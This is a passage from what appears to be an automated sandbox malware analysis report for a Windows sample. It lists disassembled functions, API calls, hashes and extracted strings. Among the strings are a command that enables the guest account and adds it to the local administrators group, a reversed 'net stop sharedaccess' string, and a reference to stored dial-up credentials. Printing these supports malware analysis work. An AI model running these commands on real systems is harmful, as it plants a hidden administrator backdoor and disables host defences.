                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Info
                        • String ID: $
                        • API String ID: 1807457897-3032137957
                        • Opcode ID: 263621409502b165fc90dc6ac40275e9da63e8f769559f170b621f7e3eaae7e0
                        • Instruction ID: afefa19f00cfb59d49103e56bb47d0362d5b0b4d9a5c217c2fcf475354c60b3e
                        • Opcode Fuzzy Hash: 263621409502b165fc90dc6ac40275e9da63e8f769559f170b621f7e3eaae7e0
                        • Instruction Fuzzy Hash: 8341AAB12402585AEB22D764DD49BEB3FA89B42700F8400F6D749E71D3C2794949DBBE
                        Function 1000B430 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68processCOMMON
                        Download Yara Rule
                        APIs
                        • WinExec.KERNEL32(00000000,00000000), ref: 1000B4D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exec
                        • String ID: /del$net user
                        • API String ID: 459137531-2512890511
                        • Opcode ID: 91d8367e343b3af0dc84c5d67d22bb34f7c443041aa661ca2b2a57c5264f0420
                        • Instruction ID: ab36fe985a1cdb475bc27265b5430908ddbc4f3a83551e633133ded5876f8b47
                        • Opcode Fuzzy Hash: 91d8367e343b3af0dc84c5d67d22bb34f7c443041aa661ca2b2a57c5264f0420
                        • Instruction Fuzzy Hash: 3111D076600A085BD71CCA38D8906AB76D2FBC4330F244B3EFA66C32D0DEB98D49C255
                        Function 004036AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ILQ18dgzMU.exe,00000104,?,00000000,?,?,?,?,00401DAF), ref: 004036CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: FileModuleName
                        • String ID: C:\Users\user\Desktop\ILQ18dgzMU.exe$`%G
                        • API String ID: 514040917-1292026093
                        • Opcode ID: 157db99772176f6e922919b32deba600d816f0bed860eb8f39c773135dfa13ae
                        • Instruction ID: 9b5b162b2e34576d815ca683353452d89f1889f74bab53538c3552c1a8d74188
                        • Opcode Fuzzy Hash: 157db99772176f6e922919b32deba600d816f0bed860eb8f39c773135dfa13ae
                        • Instruction Fuzzy Hash: 60118FB6A00108BFD721EF98DC81C9B7BBCEB45758B40007BF505E3242E6746F498BA8
                        Function 1000CCEE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                        Download Yara Rule
                        APIs
                        • EnumWindows.USER32(Function_0000C790,00000000), ref: 1000CD1E
                          • Part of subcall function 10004040: _ftol.MSVCRT ref: 1000407F
                          • Part of subcall function 10004040: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004089
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@EnumWindows_ftol
                        • String ID: {$|
                        • API String ID: 1507428005-264143378
                        • Opcode ID: b0026d0be66f1eda29ea7d483d4eb73902614b2ddebdd420a585239467d1b67b
                        • Instruction ID: 48f960eb61c7d18a63d45d5ac053b42ebbae987953eee1fc5e80c4f33b21dade
                        • Opcode Fuzzy Hash: b0026d0be66f1eda29ea7d483d4eb73902614b2ddebdd420a585239467d1b67b
                        • Instruction Fuzzy Hash: 2501DB72604248DFE714DF64D855BAEB7A5FB88310F00426EEA0997281CB795D04C750
                        Function 10006A00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006A13
                        • sprintf.MSVCRT ref: 10006A5E
                        Strings
                        • \Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 10006A19
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: DirectorySystemsprintf
                        • String ID: \Program Files\Internet Explorer\IEXPLORE.EXE
                        • API String ID: 2264545904-1152295267
                        • Opcode ID: 4c9d0e8e0a58ad294016534cb1870cde04a4299a1cf7151f2c2b22f50b8e60b1
                        • Instruction ID: 26e6067db21bf9f093eba691515bc3598a3c42f118b52c7456066b92f6eaefac
                        • Opcode Fuzzy Hash: 4c9d0e8e0a58ad294016534cb1870cde04a4299a1cf7151f2c2b22f50b8e60b1
                        • Instruction Fuzzy Hash: 83F0F6326042042BD3188678DC99BDB7B8AEBC4331F54872EFAA6872C0D9B98908C255
                        Function 1000B550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32processCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exec_strrev
                        • String ID: sseccaderahs pots ten
                        • API String ID: 37789026-4286520837
                        • Opcode ID: dec7a84a52131b3bfd9164eabb175c7f0188209067fcde797e1359544444c755
                        • Instruction ID: e408ea9d6fbdcda100271d0217de8f8ddb7dcf5cae5f769b224f763a0d9b1bb5
                        • Opcode Fuzzy Hash: dec7a84a52131b3bfd9164eabb175c7f0188209067fcde797e1359544444c755
                        • Instruction Fuzzy Hash: E1F0A0B660064027E7189638EC556EB7A96ABC4720F84462CFB6BC72D0D9B99948C281
                        Function 1000B4F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29processCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add, xrefs: 1000B524
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Execwsprintf
                        • String ID: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                        • API String ID: 3709078785-529560147
                        • Opcode ID: 57d901f5c6d0af30392e46c580b32ad8a8e264edd4c258811f567c1f42eea1ee
                        • Instruction ID: 0dfb14cd00998543234ec43e9161a599682dabd837b929042deb7285531c2250
                        • Opcode Fuzzy Hash: 57d901f5c6d0af30392e46c580b32ad8a8e264edd4c258811f567c1f42eea1ee
                        • Instruction Fuzzy Hash: 78F0E5B56003007BF310C728DC84B8BB6E5ABD4B04F10C839F784D2290EABDD958C55A
                        Function 00402505 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 0040252D
                        • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 00402561
                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 0040257B
                        • HeapFree.KERNEL32(00000000,?,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 00402592
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocHeap$FreeVirtual
                        • String ID:
                        • API String ID: 3499195154-0
                        • Opcode ID: 8e23c4de90f869c85d7b3c765da6344e33f9d3ef4aa6ff554b2f35fe3fd4e612
                        • Instruction ID: 2cd63bbe23fb9df11260aeb6a55fbd4571b63b70dd59cd903e42edb8bdf6c863
                        • Opcode Fuzzy Hash: 8e23c4de90f869c85d7b3c765da6344e33f9d3ef4aa6ff554b2f35fe3fd4e612
                        • Instruction Fuzzy Hash: 66112870200601BFD7318F28ED49E227BB5FB897557904A3AF166E65F2D370989ACB4C
                        Function 100072F0 Relevance: 5.0, APIs: 4, Instructions: 32stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,10007386,?,?,?,L$_RasDefaultCredentials#0), ref: 100072FE
                        • malloc.MSVCRT ref: 10007316
                        • lstrlen.KERNEL32(?,00000000,4C8D0824,L$_RasDefaultCredentials#0,?,?,?,?,?,?,?,?,100075E1,?), ref: 1000732B
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,100075E1,?), ref: 10007333
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$ByteCharMultiWidemalloc
                        • String ID:
                        • API String ID: 3822420913-0
                        • Opcode ID: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                        • Instruction ID: a4b6d9cd29bce437580047181b5565ca307375c70172c03540230846982f558e
                        • Opcode Fuzzy Hash: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                        • Instruction Fuzzy Hash: F7F0A7B21403526BF2209B54CC8AE7BB3BCEF89721F00442DF585C7240D668A805C372